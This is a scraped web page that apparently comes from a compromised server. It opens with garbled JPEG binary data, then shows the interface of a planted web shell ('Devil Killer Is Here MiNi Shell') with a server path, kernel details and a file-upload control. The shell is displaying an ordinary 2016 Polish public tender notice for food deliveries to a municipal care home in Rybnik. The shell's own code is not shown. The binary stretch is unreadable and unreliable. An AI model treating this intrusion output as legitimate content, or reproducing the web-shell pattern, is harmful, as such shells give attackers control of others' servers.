JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161110/340159-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='bip.mdps.rybnik.pl' target='_blank'>bip.mdps.rybnik.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 340159 - 2016
              z dnia 2016-11-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rybnik: Sukcesywny zakup wraz z dostawą żywności dla Miejskiego Domu Pomocy Społecznej w Rybniku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miejski Dom Pomocy Społecznej, krajowy numer identyfikacyjny
              27822893400000, ul.
              ul. Żużlowa 
              25,
              44200  
              Rybnik, woj.
              śląskie, państwo
              Polska, tel.
              0-32 4236075 w. 110, e-mail
              , faks
              0-32 4236075 w. 130.
              <br />
              Adres strony internetowej (URL): www.mdps.rybnik.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />bip.mdps.rybnik.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />bip.mdps.rybnik.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />Miejski Dom Pomocy Społecznej, ul. Żużlowa 25 Dział Gospodarczo Techniczny</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sukcesywny zakup wraz z dostawą żywności dla Miejskiego Domu Pomocy Społecznej w Rybniku<br /><b>Numer referencyjny: </b>MDPS/GT/1100/PN/1/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Sukcesywny zakup wraz z dostawą żywności dla Miejskiego Domu Pomocy Społecznej w Rybniku, w podziale na zadania:

Zadanie nr 1 -  Zakup wraz z dostawą mięsa i wyrobów mięsnych dla Miejskiego Domu Pomocy  Społecznej w Rybniku.
Zadanie nr 2  Zakup wraz z dostawą drobiu dla Miejskiego Domu Pomocy Społecznej w Rybniku.
Zadanie nr 3  Zakup wraz z dostawą różnych produktów spożywczych dla Miejskiego Domu Pomoc Społecznej w Rybniku
Zadanie nr 4  Zakup wraz z dostawą artykułów sypkich dla Miejskiego Domu Pomocy Społecznej w  Rybniku.
Zadanie nr 5  Zakup wraz z dostawą produktów mleczarskich dla Miejskiego Domu Pomocy    Społecznej w Rybniku.
Zadanie nr 6  Zakup wraz z dostawą jaj dla Miejskiego Domu Pomocy Społecznej w Rybniku
Zadanie nr 7  Zakup wraz z dostawą warzyw i owoców dla Miejskiego Domu Pomocy Społecznej w Rybniku.
Zadanie nr 8  Zakup wraz z dostawą ryb i przetworów rybnych dla Miejskiego Domu Pomocy Społecznej w Rybniku.
Zadanie nr 9  Zakup wraz z dostawą produktów mrożonych dla Miejskiego Domu Pomocy Społecznej w Rybniku. Szczegółowy zakres zamówienia określa SIWZ.          
<br /><br /><b>II.5) Główny kod CPV: </b>15000000-8<br /><b> Dodatkowe kody CPV:</b>15100000-9,
                15800000-6,
                15600000-4,
                15500000-3,
                03142500-3,
                03100000-2,
                03311000-2,
                15200000-0,
                15220000-6,
                15331100-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Dla zadania nr 1 i 2- Decyzja właściwego organu tj. Państwowej Inspekcji Sanitarnej lub Państwowej Inspekcji Weterynaryjnej dotyczącej możliwości produkcji lub obrotu danym towarem spożywczym będącym przedmiotem zamówienia.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, zrealizował co najmniej 2 zadania odpowiadające przedmiotowi zamówienia o wartości (każde zadanie) brutto minimum:
Dla zadania nr 1  50 000,00 zł
Dla zadania nr 2  20 000,00 zł
Dla zadania nr 3  30 000,00 zł
Dla zadania nr 4  10 000,00 zł
Dla zadania nr 5  30 000,00 zł
Dla zadania nr 6  5 000,00 zł
Dla zadania nr 7  30 000,00 zł
Dla zadanie nr 8  20 000,00 zł
Dla zadania nr 9  20 000,00 zł

-Wykonawca spełni warunek jeżeli wykaże, że posiada środki transportu, którymi dostarczał będzie przedmiot zamówienia, odpowiadające wymaganiom sanitarnym, określonym w ustawie z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (tekst jedn. z 2010r. Dz. U. nr 136, poz. 914 ze zm.) i prawie unijnym. 
2.	Warunki udziału w postępowaniu dotyczące zdolności technicznej i zawodowej muszą być spełnione: 
1)	przez Wykonawcę samodzielnie lub
2)	w przypadku podmiotów występujących wspólnie  samodzielnie przez minimum jednego 
z wykonawców występujących wspólnie. 
Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego doświadczenia w ramach doświadczenia różnych podmiotów zaangażowanych w realizację zamówienia. 
3.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, 
w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Dla zadania nr 1 i 2- Decyzja właściwego organu tj. Państwowej Inspekcji Sanitarnej lub Państwowej Inspekcji Weterynaryjnej dotyczącej możliwości produkcji lub obrotu danym towarem spożywczym będącym przedmiotem zamówienia.- 
Dla wszystkich zadań zgodnie z wymogami SIWZ wykaz dostaw wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane na formularzu zgodnym z treścią załącznika nr 5 do SIWZ, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy. 
- oświadczenie o posiadanych środkach transportu na formularzu zgodnym z treścią załącznika nr 7 do SIWZ.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Formularz ofertowy.
2.	Zestawienie kosztów 
3.	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, 
o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postepowaniu,  składa każdy z Wykonawców wspólnie ubiegających się 
o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 
5.	Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:
1)	Wykonawców wspólnie ubiegających się o udzielenie zamówienia  pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy,
2)	podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz 
z ofertą  pełnomocnictwo do podpisania oferty.
3)	Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
4)	Zamawiający zamieści informacje, o których mowa w art. 86 ust. 5 ustawy w pliku o nazwie Zbiorcze zestawienie ofert na swojej stronie internetowej: bip.mdps.rybnik.pl

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
